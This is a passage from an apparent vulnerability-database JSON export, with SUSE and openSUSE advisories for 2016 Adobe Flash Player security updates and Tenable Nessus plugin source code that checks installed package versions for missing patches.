["CVE-2016-1019"], "modified": "2016-04-08T22:07:39", "id": "OPENSUSE-SU-2016:0997-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00012.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:59:17", "description": "This security update for flash-player to 11.2.202.621 fixes the following\n issues (boo#979422):\n\n A critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player\n 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome\n OS. Successful exploitation could cause a crash and potentially allow an\n attacker to take control of the affected system. (APSA16-02)\n\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\">https://helpx.adobe.com/security/products/flash-player/apsa16-02.html</a>\n\n Some CVEs were not listed in the last submission:\n * APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012,\n CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016,\n CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024,\n CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033\n\n", "cvss3": {}, "published": "2016-05-17T02:07:54", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-4117", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2016-05-17T02:07:54", "id": 
"OPENSUSE-SU-2016:1306-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00045.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:44:54", "description": "This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.621 (bsc#979422):\n * APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097, CVE-2016-1098,\n CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102,\n CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110,\n CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111,\n CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115,\n CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous release, but got\n published afterwards:\n * APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012,\n CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016,\n CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024,\n CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\n\n", "cvss3": {}, "published": "2016-05-16T18:08:08", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1100", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1102", "CVE-2016-1026", "CVE-2016-1098", "CVE-2016-1021", "CVE-2016-4108", "CVE-2016-1019", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-1018", "CVE-2016-4117", "CVE-2016-1013", "CVE-2016-4116", "CVE-2016-1006", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-1023", "CVE-2016-4113", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-4112", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", 
"CVE-2016-1106", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-1025", "CVE-2016-4115", "CVE-2016-1016", "CVE-2016-1105", "CVE-2016-1099", "CVE-2016-1015"], "modified": "2016-05-16T18:08:08", "id": "SUSE-SU-2016:1305-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00044.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2022-06-11T16:06:34", "description": "flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2016-1019: Adobe Flash Player earlier allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors, as exploited in the wild in April 2016 Aliased: (bsc#974209).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-2016-440)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2016-440.NASL", "href": "https://www.tenable.com/plugins/nessus/90479", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-440.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90479);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2016-1019\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2016-440)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2016-1019: Adobe Flash Player earlier allowed remote\n attackers to cause a denial of service (application\n crash) or possibly execute arbitrary code via\n unspecified vectors, as exploited in the wild in April\n 2016 Aliased: (bsc#974209).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=974209\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-player packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.616-159.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.616-159.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.616-159.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-13T14:31:12", "description": 
"flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2016-1019: Adobe Flash Player earlier allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors, as exploited in the wild in April 2016 Aliased: (bsc#974209).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-2016-433)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-433.NASL", "href": "https://www.tenable.com/plugins/nessus/90476", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-433.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90476);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2016-1019\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2016-433)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2016-1019: Adobe Flash Player earlier allowed remote\n attackers to cause a denial of service (application\n crash) or 
possibly execute arbitrary code via\n unspecified vectors, as exploited in the wild in April\n 2016 Aliased: (bsc#974209).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=974209\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-player packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.616-2.94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.616-2.94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.616-2.94.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T16:06:55", "description": "flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2016-1019: Adobe Flash Player allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors, as exploited in the wild in April 2016 (bsc#974209).\n\nNote that Tenable Network Security has 
extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-13T00:00:00", "type": "nessus", "title": "SUSE SLED12 Security Update : flash-player (SUSE-SU-2016:0990-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:flash-player", "p-cpe:/a:novell:suse_linux:flash-player-gnome", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-0990-1.NASL", "href": "https://www.tenable.com/plugins/nessus/90505", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0990-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90505);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2016-1019\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"SUSE SLED12 Security Update : flash-player (SUSE-SU-2016:0990-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2016-1019: Adobe Flash Player allowed remote\n attackers to cause a denial of service (application\n crash) or possibly execute arbitrary code via\n unspecified vectors, as exploited in the wild in April\n 2016 (bsc#974209).\n\nNote that Tenable Network Security has extracted the 
preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=974209\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1019/\");\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160990-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5c9214d2\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-582=1\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-582=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-582=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-582=1\n\nTo bring your system up-to-date, use 'zypper patch'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/13\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.616-126.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.616-126.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.616-126.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.616-126.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:26:15", "description": "The remote host is affected by the vulnerability described in GLSA-201606-08 (Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-20T00:00:00", "type": "nessus", "title": "GLSA-201606-08 : Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1019", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163", "CVE-2016-4171"], "modified": "2022-03-28T00:00:00", 
"cpe": ["p-cpe:/a:gentoo:linux:adobe-flash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201606-08.NASL", "href": "https://www.tenable.com/plugins/nessus/91702", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201606-08.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91702);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\n \"CVE-2016-1019\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\",\n \"CVE-2016-4171\"\n );\n script_xref(name:\"GLSA\", value:\"201606-08\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"GLSA-201606-08 : Adobe Flash Player: Multiple vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-201606-08\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is 
no known workaround at this time.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/201606-08\");\n script_set_attribute(attribute:\"solution\", value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose 'www-plugins/adobe-flash-11.2.202.626'\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.626\"), vulnerable:make_list(\"lt 11.2.202.626\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) 